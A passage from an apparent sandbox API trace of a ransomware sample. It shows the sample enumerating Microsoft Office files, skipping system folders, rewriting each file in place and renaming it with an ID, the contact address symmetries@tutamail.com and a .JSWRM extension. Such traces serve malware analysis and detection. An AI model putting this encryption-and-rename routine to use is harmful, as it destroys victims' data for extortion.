lpDistanceToMoveHigh=0x0) returned 0x0 [0121.391] WriteFile (in: hFile=0x238, lpBuffer=0x2092d8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0121.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0121.391] CloseHandle (hObject=0x238) returned 1 [0121.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0121.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0121.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0121.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0121.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0121.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0121.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.391] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0121.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0121.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0121.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0121.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0121.392] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_ONLINE_COL.HXC", cAlternateFileName="SKYPEF~4.HXC")) returned 1 [0121.392] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXC", lpString2=".") returned 1 [0121.392] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXC", lpString2="..") returned 1 [0121.392] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXC", lpString2="...") returned 1 [0121.392] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXC", lpString2="windows") returned -1 [0121.392] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXC", lpString2="recovery") returned 1 [0121.392] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXC", lpString2="perflogs") returned 1 [0121.392] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXC", lpString2="documents and settings") returned 1 [0121.392] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0121.393] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXC", lpString2="system volume information") returned -1 [0121.393] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXC", lpString2="msocache") returned 1 [0121.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_COL.HXC", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0121.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0121.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_COL.HXC", cchWideChar=22, lpMultiByteStr=0x2411c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINE_COL.HXC", lpUsedDefaultChar=0x0) returned 22 [0121.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_COL.HXC", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0121.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0121.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_COL.HXC", cchWideChar=22, lpMultiByteStr=0x2411f0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINE_COL.HXC", lpUsedDefaultChar=0x0) returned 22 [0121.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0121.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0121.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0121.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.394] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=666) returned 1 [0121.394] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x290) returned 0x20b1f8 [0121.394] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x290, lpOverlapped=0x0) returned 1 [0121.395] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.395] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x290, lpOverlapped=0x0) returned 1 [0121.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0121.395] CloseHandle (hObject=0x238) returned 1 [0121.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0121.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0121.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0121.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0121.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0121.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0121.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.396] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0121.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0121.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0121.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0121.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0121.397] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_ONLINE_COL.HXT", cAlternateFileName="SKYPEF~3.HXT")) returned 1 [0121.397] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXT", lpString2=".") returned 1 [0121.397] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXT", lpString2="..") returned 1 [0121.397] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXT", lpString2="...") returned 1 [0121.397] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXT", lpString2="windows") returned -1 [0121.397] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXT", lpString2="recovery") returned 1 [0121.397] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXT", lpString2="perflogs") returned 1 [0121.397] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXT", lpString2="documents and settings") returned 1 [0121.397] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0121.397] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXT", lpString2="system volume information") returned -1 [0121.397] lstrcmpiW (lpString1="SKYPEFB_ONLINE_COL.HXT", lpString2="msocache") returned 1 [0121.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_COL.HXT", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0121.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0121.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_COL.HXT", cchWideChar=22, lpMultiByteStr=0x241330, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINE_COL.HXT", lpUsedDefaultChar=0x0) returned 22 [0121.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_COL.HXT", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0121.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0121.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_COL.HXT", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINE_COL.HXT", lpUsedDefaultChar=0x0) returned 22 [0121.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0121.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0121.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0121.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.398] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=214) returned 1 [0121.398] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0121.398] ReadFile (in: hFile=0x238, lpBuffer=0x22df20, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22df20*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0121.403] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.403] WriteFile (in: hFile=0x238, lpBuffer=0x22df20*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22df20*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0121.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0121.403] CloseHandle (hObject=0x238) returned 1 [0121.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0121.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0121.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0121.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0121.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0121.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0121.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.404] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0121.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0121.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0121.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0121.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0121.405] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_ONLINE_F_COL.HXK", cAlternateFileName="SKCB23~1.HXK")) returned 1 [0121.405] lstrcmpiW (lpString1="SKYPEFB_ONLINE_F_COL.HXK", lpString2=".") returned 1 [0121.405] lstrcmpiW (lpString1="SKYPEFB_ONLINE_F_COL.HXK", lpString2="..") returned 1 [0121.405] lstrcmpiW (lpString1="SKYPEFB_ONLINE_F_COL.HXK", lpString2="...") returned 1 [0121.405] lstrcmpiW (lpString1="SKYPEFB_ONLINE_F_COL.HXK", lpString2="windows") returned -1 [0121.405] lstrcmpiW (lpString1="SKYPEFB_ONLINE_F_COL.HXK", lpString2="recovery") returned 1 [0121.405] lstrcmpiW (lpString1="SKYPEFB_ONLINE_F_COL.HXK", lpString2="perflogs") returned 1 [0121.405] lstrcmpiW (lpString1="SKYPEFB_ONLINE_F_COL.HXK", lpString2="documents and settings") returned 1 [0121.405] lstrcmpiW (lpString1="SKYPEFB_ONLINE_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0121.405] lstrcmpiW (lpString1="SKYPEFB_ONLINE_F_COL.HXK", lpString2="system volume information") returned -1 [0121.405] lstrcmpiW (lpString1="SKYPEFB_ONLINE_F_COL.HXK", lpString2="msocache") returned 1 [0121.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0121.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_F_COL.HXK", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0121.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0121.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_F_COL.HXK", cchWideChar=24, lpMultiByteStr=0x240fc0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINE_F_COL.HXK", lpUsedDefaultChar=0x0) returned 24 [0121.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0121.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0121.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_F_COL.HXK", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0121.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0121.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_F_COL.HXK", cchWideChar=24, lpMultiByteStr=0x240ef8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINE_F_COL.HXK", lpUsedDefaultChar=0x0) returned 24 [0121.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0121.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0121.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0121.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0121.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.407] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0121.407] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 